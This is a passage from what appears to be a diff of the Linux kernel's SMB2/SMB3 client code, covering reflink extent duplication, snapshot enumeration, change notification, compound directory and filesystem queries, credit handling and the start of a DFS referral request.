++			    cfile->fid.volatile_fid, cfile->pid, &eof);
++}
++
++static int
++smb2_duplicate_extents(const unsigned int xid,
++			struct cifsFileInfo *srcfile,
++			struct cifsFileInfo *trgtfile, u64 src_off,
++			u64 len, u64 dest_off)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct inode *inode;
++	struct duplicate_extents_to_file dup_ext_buf;
++	struct cifs_tcon *tcon = tlink_tcon(trgtfile->tlink);
++
++	/* the server advertises duplicate extent support with this flag */
++	if ((le32_to_cpu(tcon->fsAttrInfo.Attributes) &
++	     FILE_SUPPORTS_BLOCK_REFCOUNTING) == 0)
++		return -EOPNOTSUPP;
++
++	dup_ext_buf.VolatileFileHandle = srcfile->fid.volatile_fid;
++	dup_ext_buf.PersistentFileHandle = srcfile->fid.persistent_fid;
++	dup_ext_buf.SourceFileOffset = cpu_to_le64(src_off);
++	dup_ext_buf.TargetFileOffset = cpu_to_le64(dest_off);
++	dup_ext_buf.ByteCount = cpu_to_le64(len);
++	cifs_dbg(FYI, "Duplicate extents: src off %lld dst off %lld len %lld\n",
++		src_off, dest_off, len);
++
++	inode = d_inode(trgtfile->dentry);
++	if (inode->i_size < dest_off + len) {
++		rc = smb2_set_file_size(xid, tcon, trgtfile, dest_off + len, false);
++		if (rc)
++			goto duplicate_extents_out;
++
++		/*
++		 * Although we could also set a plausible allocation size
++		 * (i_blocks) here in addition to setting the file size, in
++		 * reflink it is likely that the target file is sparse. Its
++		 * allocation size will be queried on the next revalidate,
++		 * but it is important to make sure that the file's cached
++		 * size is updated immediately.
++		 */
++		cifs_setsize(inode, dest_off + len);
++	}
++	rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
++			trgtfile->fid.volatile_fid,
++			FSCTL_DUPLICATE_EXTENTS_TO_FILE,
++			(char *)&dup_ext_buf,
++			sizeof(struct duplicate_extents_to_file),
++			CIFSMaxBufSize, NULL,
++			&ret_data_len);
++
++	if (ret_data_len > 0)
++		cifs_dbg(FYI, "Non-zero response length in duplicate extents\n");
++
++duplicate_extents_out:
++	return rc;
++}
++
++static int
++smb2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	return SMB2_set_compression(xid, tcon, cfile->fid.persistent_fid,
++			    cfile->fid.volatile_fid);
++}
++
++static int
++smb3_set_integrity(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	struct fsctl_set_integrity_information_req integr_info;
++	unsigned int ret_data_len;
++
++	integr_info.ChecksumAlgorithm = cpu_to_le16(CHECKSUM_TYPE_UNCHANGED);
++	integr_info.Flags = 0;
++	integr_info.Reserved = 0;
++
++	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_SET_INTEGRITY_INFORMATION,
++			(char *)&integr_info,
++			sizeof(struct fsctl_set_integrity_information_req),
++			CIFSMaxBufSize, NULL,
++			&ret_data_len);
++
++}
++
++/* GMT Token is @GMT-YYYY.MM.DD-HH.MM.SS Unicode which is 48 bytes + null */
++#define GMT_TOKEN_SIZE 50
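++/* i.e. 24 characters * 2 bytes per UTF-16 char = 48, plus a 2 byte null */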
++
++#define MIN_SNAPSHOT_ARRAY_SIZE 16 /* See MS-SMB2 section 3.3.5.15.1 */
++
++/*
++ * Input buffer contains (empty) struct smb_snapshot array with size filled in
++ * For output see struct SRV_SNAPSHOT_ARRAY in MS-SMB2 section 2.2.32.2
++ */
++static int
++smb3_enum_snapshots(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, void __user *ioc_buf)
++{
++	char *retbuf = NULL;
++	unsigned int ret_data_len = 0;
++	int rc;
++	u32 max_response_size;
++	struct smb_snapshot_array snapshot_in;
++
++	/*
++	 * On the first query to enumerate the list of snapshots available
++	 * for this volume the buffer begins with 0 (the number of snapshots
++	 * which can be returned is zero since at that point we do not know
++	 * how big the buffer needs to be). On the second query,
++	 * it (ret_data_len) is set to the number of snapshots so we know
++	 * to set the maximum response size larger (see below).
++	 */
++	if (get_user(ret_data_len, (unsigned int __user *)ioc_buf))
++		return -EFAULT;
++
++	/*
++	 * Note that for snapshot queries, servers like Azure expect the
++	 * first query to be of minimal size (and just used to get the
++	 * number/size of previous versions) so the response size must be
++	 * specified as EXACTLY sizeof(struct snapshot_array), which is 16
++	 * when rounded up to a multiple of eight bytes.
++	 */
++	if (ret_data_len == 0)
++		max_response_size = MIN_SNAPSHOT_ARRAY_SIZE;
++	else
++		max_response_size = CIFSMaxBufSize;
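++
++	/*
++	 * Typical flow: the caller first passes snapshot_array_size = 0,
++	 * gets back just the sizes from the SRV_SNAPSHOT_ARRAY header,
++	 * then allocates a buffer that large and repeats the ioctl to
++	 * receive the actual GMT tokens.
++	 */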
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_SRV_ENUMERATE_SNAPSHOTS,
++			NULL, 0 /* no input data */, max_response_size,
++			(char **)&retbuf,
++			&ret_data_len);
++	cifs_dbg(FYI, "enum snapshots ioctl returned %d and ret buflen is %d\n",
++			rc, ret_data_len);
++	if (rc)
++		return rc;
++
++	if (ret_data_len && (ioc_buf != NULL) && (retbuf != NULL)) {
++		/* Fixup buffer */
++		if (copy_from_user(&snapshot_in, ioc_buf,
++		    sizeof(struct smb_snapshot_array))) {
++			rc = -EFAULT;
++			kfree(retbuf);
++			return rc;
++		}
++
++		/*
++		 * Check for min size, i.e. not large enough to fit even one
++		 * GMT token (snapshot). On the first ioctl some users may
++		 * pass in a smaller size (or zero) to simply get the size of
++		 * the array so the user space caller can allocate sufficient
++		 * memory and retry the ioctl again with an array size large
++		 * enough to hold all of the snapshot GMT tokens on the
++		 * second try.
++		 */
++		if (snapshot_in.snapshot_array_size < GMT_TOKEN_SIZE)
++			ret_data_len = sizeof(struct smb_snapshot_array);
++
++		/*
++		 * We return struct SRV_SNAPSHOT_ARRAY, followed by
++		 * the snapshot array (of 50 byte GMT tokens), each
++		 * representing an available previous version of the data.
++		 */
++		if (ret_data_len > (snapshot_in.snapshot_array_size +
++					sizeof(struct smb_snapshot_array)))
++			ret_data_len = snapshot_in.snapshot_array_size +
++					sizeof(struct smb_snapshot_array);
++
++		if (copy_to_user(ioc_buf, retbuf, ret_data_len))
++			rc = -EFAULT;
++	}
++
++	kfree(retbuf);
++	return rc;
++}
++
++
++
++static int
++smb3_notify(const unsigned int xid, struct file *pfile,
++	    void __user *ioc_buf, bool return_changes)
++{
++	struct smb3_notify_info notify;
++	struct smb3_notify_info __user *pnotify_buf;
++	struct dentry *dentry = pfile->f_path.dentry;
++	struct inode *inode = file_inode(pfile);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct cifs_tcon *tcon;
++	const unsigned char *path;
++	char *returned_ioctl_info = NULL;
++	void *page = alloc_dentry_path();
++	__le16 *utf16_path = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int rc = 0;
++	__u32 ret_len = 0;
++
++	path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(path)) {
++		rc = PTR_ERR(path);
++		goto notify_exit;
++	}
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (utf16_path == NULL) {
++		rc = -ENOMEM;
++		goto notify_exit;
++	}
++
++	if (return_changes) {
++		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify_info))) {
++			rc = -EFAULT;
++			goto notify_exit;
++		}
++	} else {
++		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify))) {
++			rc = -EFAULT;
++			goto notify_exit;
++		}
++		notify.data_len = 0;
++	}
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
++		       NULL);
++	if (rc)
++		goto notify_exit;
++
++	rc = SMB2_change_notify(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++				notify.watch_tree, notify.completion_filter,
++				notify.data_len, &returned_ioctl_info, &ret_len);
++
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++	cifs_dbg(FYI, "change notify for path %s rc %d\n", path, rc);
++	if (return_changes && (ret_len > 0) && (notify.data_len > 0)) {
++		if (ret_len > notify.data_len)
++			ret_len = notify.data_len;
++		pnotify_buf = (struct smb3_notify_info __user *)ioc_buf;
++		if (copy_to_user(pnotify_buf->notify_data, returned_ioctl_info, ret_len))
++			rc = -EFAULT;
++		else if (copy_to_user(&pnotify_buf->data_len, &ret_len, sizeof(ret_len)))
++			rc = -EFAULT;
++	}
++	kfree(returned_ioctl_info);
++notify_exit:
++	free_dentry_path(page);
++	kfree(utf16_path);
++	return rc;
++}
++
++static int
++smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *path, struct cifs_sb_info *cifs_sb,
++		     struct cifs_fid *fid, __u16 search_flags,
++		     struct cifs_search_info *srch_inf)
++{
++	__le16 *utf16_path;
++	struct smb_rqst rqst[2];
++	struct kvec rsp_iov[2];
++	int resp_buftype[2];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qd_iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
++	int rc, flags = 0;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct smb2_query_directory_rsp *qd_rsp = NULL;
++	struct smb2_create_rsp *op_rsp = NULL;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int retry_count = 0;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto qdf_free;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	/* Query directory */
++	srch_inf->entries_in_buffer = 0;
++	srch_inf->index_of_last_entry = 2;
++
++	memset(&qd_iov, 0, sizeof(qd_iov));
++	rqst[1].rq_iov = qd_iov;
++	rqst[1].rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
++
++	rc = SMB2_query_directory_init(xid, tcon, server,
++				       &rqst[1],
++				       COMPOUND_FID, COMPOUND_FID,
++				       0, srch_inf->info_level);
++	if (rc)
++		goto qdf_free;
++
++	smb2_set_related(&rqst[1]);
++
++again:
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 2, rqst,
++				resp_buftype, rsp_iov);
++
++	if (rc == -EAGAIN && retry_count++ < 10)
++		goto again;
++
++	/* If the open failed there is nothing to do */
++	op_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
++	if (op_rsp == NULL || op_rsp->hdr.Status != STATUS_SUCCESS) {
++		cifs_dbg(FYI, "query_dir_first: open failed rc=%d\n", rc);
++		goto qdf_free;
++	}
++	fid->persistent_fid = op_rsp->PersistentFileId;
++	fid->volatile_fid = op_rsp->VolatileFileId;
++
++	/* Anything other than ENODATA means a genuine error */
++	if (rc && rc != -ENODATA) {
++		SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++		cifs_dbg(FYI, "query_dir_first: query directory failed rc=%d\n", rc);
++		trace_smb3_query_dir_err(xid, fid->persistent_fid,
++					 tcon->tid, tcon->ses->Suid, 0, 0, rc);
++		goto qdf_free;
++	}
++
++	atomic_inc(&tcon->num_remote_opens);
++
++	qd_rsp = (struct smb2_query_directory_rsp *)rsp_iov[1].iov_base;
++	if (qd_rsp->hdr.Status == STATUS_NO_MORE_FILES) {
++		trace_smb3_query_dir_done(xid, fid->persistent_fid,
++					  tcon->tid, tcon->ses->Suid, 0, 0);
++		srch_inf->endOfSearch = true;
++		rc = 0;
++		goto qdf_free;
++	}
++
++	rc = smb2_parse_query_directory(tcon, &rsp_iov[1], resp_buftype[1],
++					srch_inf);
++	if (rc) {
++		trace_smb3_query_dir_err(xid, fid->persistent_fid, tcon->tid,
++			tcon->ses->Suid, 0, 0, rc);
++		goto qdf_free;
++	}
++	resp_buftype[1] = CIFS_NO_BUFFER;
++
++	trace_smb3_query_dir_done(xid, fid->persistent_fid, tcon->tid,
++			tcon->ses->Suid, 0, srch_inf->entries_in_buffer);
++
++ qdf_free:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_directory_free(&rqst[1]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	return rc;
++}
++
++static int
++smb2_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
++		    struct cifs_fid *fid, __u16 search_flags,
++		    struct cifs_search_info *srch_inf)
++{
++	return SMB2_query_directory(xid, tcon, fid->persistent_fid,
++				    fid->volatile_fid, 0, srch_inf);
++}
++
++static int
++smb2_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_fid *fid)
++{
++	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++/*
++ * If we negotiated the SMB2 protocol and got STATUS_PENDING, update
++ * the number of credits and return true; otherwise return false.
++ */
++static bool
++smb2_is_status_pending(char *buf, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	int scredits, in_flight;
++
++	if (shdr->Status != STATUS_PENDING)
++		return false;
++
++	if (shdr->CreditRequest) {
++		spin_lock(&server->req_lock);
++		server->credits += le16_to_cpu(shdr->CreditRequest);
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++		wake_up(&server->request_q);
++
++		trace_smb3_pend_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits,
++				le16_to_cpu(shdr->CreditRequest), in_flight);
++		cifs_dbg(FYI, "%s: status pending add %u credits total=%d\n",
++				__func__, le16_to_cpu(shdr->CreditRequest), scredits);
++	}
++
++	return true;
++}
++
++static bool
++smb2_is_session_expired(char *buf)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	if (shdr->Status != STATUS_NETWORK_SESSION_EXPIRED &&
++	    shdr->Status != STATUS_USER_SESSION_DELETED)
++		return false;
++
++	trace_smb3_ses_expired(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			       le64_to_cpu(shdr->SessionId),
++			       le16_to_cpu(shdr->Command),
++			       le64_to_cpu(shdr->MessageId));
++	cifs_dbg(FYI, "Session expired or deleted\n");
++
++	return true;
++}
++
++static bool
++smb2_is_status_io_timeout(char *buf)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	if (shdr->Status == STATUS_IO_TIMEOUT)
++		return true;
++	else
++		return false;
++}
++
++static void
++smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	if (shdr->Status != STATUS_NETWORK_NAME_DELETED)
++		return;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
++				spin_lock(&tcon->tc_lock);
++				tcon->need_reconnect = true;
++				spin_unlock(&tcon->tc_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				pr_warn_once("Server share %s deleted.\n",
++					     tcon->tree_name);
++				return;
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++static int
++smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
++{
++	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
++		return SMB2_lease_break(0, tcon, cinode->lease_key,
++					smb2_get_lease_state(cinode));
++
++	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
++				 CIFS_CACHE_READ(cinode) ? 1 : 0);
++}
++
++void
++smb2_set_related(struct smb_rqst *rqst)
++{
++	struct smb2_hdr *shdr;
++
++	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
++	if (shdr == NULL) {
++		cifs_dbg(FYI, "shdr NULL in smb2_set_related\n");
++		return;
++	}
++	shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
++}
++
++char smb2_padding[7] = {0, 0, 0, 0, 0, 0, 0};
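++/* at most 7 bytes of padding are ever needed for 8 byte alignment */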
++
++void
++smb2_set_next_command(struct cifs_tcon *tcon, struct smb_rqst *rqst)
++{
++	struct smb2_hdr *shdr;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = ses->server;
++	unsigned long len = smb_rqst_len(server, rqst);
++	int i, num_padding;
++
++	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
++	if (shdr == NULL) {
++		cifs_dbg(FYI, "shdr NULL in smb2_set_next_command\n");
++		return;
++	}
++
++	/* SMB headers in a compound are 8 byte aligned. */
++
++	/* No padding needed */
++	if (!(len & 7))
++		goto finished;
++
++	num_padding = 8 - (len & 7);
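++	/* e.g. len = 68: 68 & 7 = 4, so num_padding = 4 and len becomes 72 */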
++	if (!smb3_encryption_required(tcon)) {
++		/*
++		 * If we do not have encryption then we can just add an extra
++		 * iov for the padding.
++		 */
++		rqst->rq_iov[rqst->rq_nvec].iov_base = smb2_padding;
++		rqst->rq_iov[rqst->rq_nvec].iov_len = num_padding;
++		rqst->rq_nvec++;
++		len += num_padding;
++	} else {
++		/*
++		 * We cannot add a small padding iov for the encryption case
++		 * because the encryption framework cannot handle the padding
++		 * iovs. We have to flatten this into a single buffer and add
++		 * the padding to it.
++		 */
++		for (i = 1; i < rqst->rq_nvec; i++) {
++			memcpy(rqst->rq_iov[0].iov_base +
++			       rqst->rq_iov[0].iov_len,
++			       rqst->rq_iov[i].iov_base,
++			       rqst->rq_iov[i].iov_len);
++			rqst->rq_iov[0].iov_len += rqst->rq_iov[i].iov_len;
++		}
++		memset(rqst->rq_iov[0].iov_base + rqst->rq_iov[0].iov_len,
++		       0, num_padding);
++		rqst->rq_iov[0].iov_len += num_padding;
++		len += num_padding;
++		rqst->rq_nvec = 1;
++	}
++
++ finished:
++	shdr->NextCommand = cpu_to_le32(len);
++}
++
++/*
++ * Passes the query info response back to the caller on success.
++ * The caller needs to free this with free_rsp_buf().
++ */
++int
++smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *path, u32 desired_access,
++			 u32 class, u32 type, u32 output_len,
++			 struct kvec *rsp, int *buftype,
++			 struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec close_iov[1];
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	int rc;
++	__le16 *utf16_path;
++	struct cached_fid *cfid = NULL;
++
++	if (!path)
++		path = "";
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/*
++	 * We can only call this for things we know are directories.
++	 */
++	if (!strcmp(path, ""))
++		open_cached_dir(xid, tcon, path, cifs_sb, false,
++				&cfid); /* cfid null if open dir failed */
++
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto qic_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	memset(&qi_iov, 0, sizeof(qi_iov));
++	rqst[1].rq_iov = qi_iov;
++	rqst[1].rq_nvec = 1;
++
++	if (cfid) {
++		rc = SMB2_query_info_init(tcon, server,
++					  &rqst[1],
++					  cfid->fid.persistent_fid,
++					  cfid->fid.volatile_fid,
++					  class, type, 0,
++					  output_len, 0,
++					  NULL);
++	} else {
++		rc = SMB2_query_info_init(tcon, server,
++					  &rqst[1],
++					  COMPOUND_FID,
++					  COMPOUND_FID,
++					  class, type, 0,
++					  output_len, 0,
++					  NULL);
++	}
++	if (rc)
++		goto qic_exit;
++	if (!cfid) {
++		smb2_set_next_command(tcon, &rqst[1]);
++		smb2_set_related(&rqst[1]);
++	}
++
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto qic_exit;
++	smb2_set_related(&rqst[2]);
++
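++	/*
++	 * With a cached directory handle only the query itself is sent
++	 * (one request); otherwise the full open/query/close compound of
++	 * three requests goes on the wire.
++	 */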
++	if (cfid) {
++		rc = compound_send_recv(xid, ses, server,
++					flags, 1, &rqst[1],
++					&resp_buftype[1], &rsp_iov[1]);
++	} else {
++		rc = compound_send_recv(xid, ses, server,
++					flags, 3, rqst,
++					resp_buftype, rsp_iov);
++	}
++	if (rc) {
++		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++		if (rc == -EREMCHG) {
++			tcon->need_reconnect = true;
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++		}
++		goto qic_exit;
++	}
++	*rsp = rsp_iov[1];
++	*buftype = resp_buftype[1];
++
++ qic_exit:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_info_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	if (cfid)
++		close_cached_dir(cfid);
++	return rc;
++}
++
++static int
++smb2_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	struct smb2_query_info_rsp *rsp;
++	struct smb2_fs_full_size_info *info = NULL;
++	struct kvec rsp_iov = {NULL, 0};
++	int buftype = CIFS_NO_BUFFER;
++	int rc;
++
++
++	rc = smb2_query_info_compound(xid, tcon, "",
++				      FILE_READ_ATTRIBUTES,
++				      FS_FULL_SIZE_INFORMATION,
++				      SMB2_O_INFO_FILESYSTEM,
++				      sizeof(struct smb2_fs_full_size_info),
++				      &rsp_iov, &buftype, cifs_sb);
++	if (rc)
++		goto qfs_exit;
++
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++	buf->f_type = SMB2_SUPER_MAGIC;
++	info = (struct smb2_fs_full_size_info *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength),
++			       &rsp_iov,
++			       sizeof(struct smb2_fs_full_size_info));
++	if (!rc)
++		smb2_copy_fs_info_to_kstatfs(info, buf);
++
++qfs_exit:
++	free_rsp_buf(buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++static int
++smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++
++	if (!tcon->posix_extensions)
++		return smb2_queryfs(xid, tcon, cifs_sb, buf);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc)
++		return rc;
++
++	rc = SMB311_posix_qfs_info(xid, tcon, fid.persistent_fid,
++				   fid.volatile_fid, buf);
++	buf->f_type = SMB2_SUPER_MAGIC;
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	return rc;
++}
++
++static bool
++smb2_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
++{
++	return ob1->fid.persistent_fid == ob2->fid.persistent_fid &&
++	       ob1->fid.volatile_fid == ob2->fid.volatile_fid;
++}
++
++static int
++smb2_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
++	       __u64 length, __u32 type, int lock, int unlock, bool wait)
++{
++	if (unlock && !lock)
++		type = SMB2_LOCKFLAG_UNLOCK;
++	return SMB2_lock(xid, tlink_tcon(cfile->tlink),
++			 cfile->fid.persistent_fid, cfile->fid.volatile_fid,
++			 current->tgid, length, offset, type, wait);
++}
++
++static void
++smb2_get_lease_key(struct inode *inode, struct cifs_fid *fid)
++{
++	memcpy(fid->lease_key, CIFS_I(inode)->lease_key, SMB2_LEASE_KEY_SIZE);
++}
++
++static void
++smb2_set_lease_key(struct inode *inode, struct cifs_fid *fid)
++{
++	memcpy(CIFS_I(inode)->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
++}
++
++static void
++smb2_new_lease_key(struct cifs_fid *fid)
++{
++	generate_random_uuid(fid->lease_key);
++}
++
++static int
++smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
++		   const char *search_name,
++		   struct dfs_info3_param **target_nodes,
++		   unsigned int *num_of_nodes,
++		   const struct nls_table *nls_codepage, int remap)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	int utf16_path_len = 0;
++	struct cifs_tcon *tcon;
++	struct fsctl_get_dfs_referral_req *dfs_req = NULL;
++	struct get_dfs_referral_rsp *dfs_rsp = NULL;
++	u32 dfs_req_size = 0, dfs_rsp_size = 0;
++	int retry_count = 0;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, search_name);
++
++	/*
++	 * Try to use the IPC tcon, otherwise just use any
++	 */
++	tcon = ses->tcon_ipc;
++	if (tcon == NULL) {
++		spin_lock(&cifs_tcp_ses_lock);
++		tcon = list_first_entry_or_null(&ses->tcon_list,
++						struct cifs_tcon,
++						tcon_list);
++		if (tcon)
++			tcon->tc_count++;
++		spin_unlock(&cifs_tcp_ses_lock);
++	}
++
++	if (tcon == NULL) {
++		cifs_dbg(VFS, "session %p has no tcon available for a dfs referral request\n",
++			 ses);
++		rc = -ENOTCONN;
++		goto out;
++	}
++
++	utf16_path = cifs_strndup_to_utf16(search_name, PATH_MAX,
++					   &utf16_path_len,
++					   nls_codepage, remap);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	dfs_req_size = sizeof(*dfs_req) + utf16_path_len;
++	dfs_req = kzalloc(dfs_req_size, GFP_KERNEL);
++	if (!dfs_req) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	/* Highest DFS referral version understood */
++	dfs_req->MaxReferralLevel = DFS_VERSION;
++
++	/* Path to resolve, as a null-terminated UTF-16 string */
++	memcpy(dfs_req->RequestFileName, utf16_path, utf16_path_len);
++
++	do {
++		rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++				FSCTL_DFS_GET_REFERRALS,
++				(char *)dfs_req, dfs_req_size, CIFSMaxBufSize,
++				(char **)&dfs_rsp, &dfs_rsp_size);
++		if (!is_retryable_error(rc))
++			break;
++		usleep_range(512, 2048);
++	} while (++retry_count < 5);
++
++	if (rc) {
++		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
